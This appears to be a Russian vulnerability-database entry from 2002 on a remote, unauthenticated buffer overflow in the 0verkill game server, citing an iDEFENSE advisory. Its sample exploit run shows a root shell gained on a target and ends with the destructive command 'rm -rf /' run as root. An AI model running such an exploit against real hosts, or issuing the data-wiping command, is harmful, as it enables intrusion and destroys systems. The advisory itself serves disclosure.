| Дата публикации: | 18.12.2002 |
| Всего просмотров: | 1127 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | 0verkill популярная клиент-серверная игра в ASCII art. Серверная часть 0verkill по умолчанию установлена на 6666 UDP порту. В программе обнаружена возможность удаленного переполнения буфера, которое может использоваться для выполнения произвольного кода с привилегиями 0verkill процесса. Для успешной эксплуатации уязвимости не требуется предварительная идентификация. Пример работы эксплоита: deraadt@zeus.theos.com:~$ ./0verkillflow -t 5 -h 192.168.0.1 -o l -p 6666 Attacking host 192.168.0.1 (Linux 2.4.20-grsec). *GOBBLE* id; uname -a uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Linux spender 2.4.20 #1 Sat Dec 7 13:44:54 EST 2002 i686 unknown ^C deraadt@zeus.theos.com:~$ su - Password: root@zeus.theos.com:~# rm -rf /& |
| Ссылки: | iDEFENSE Security Advisory |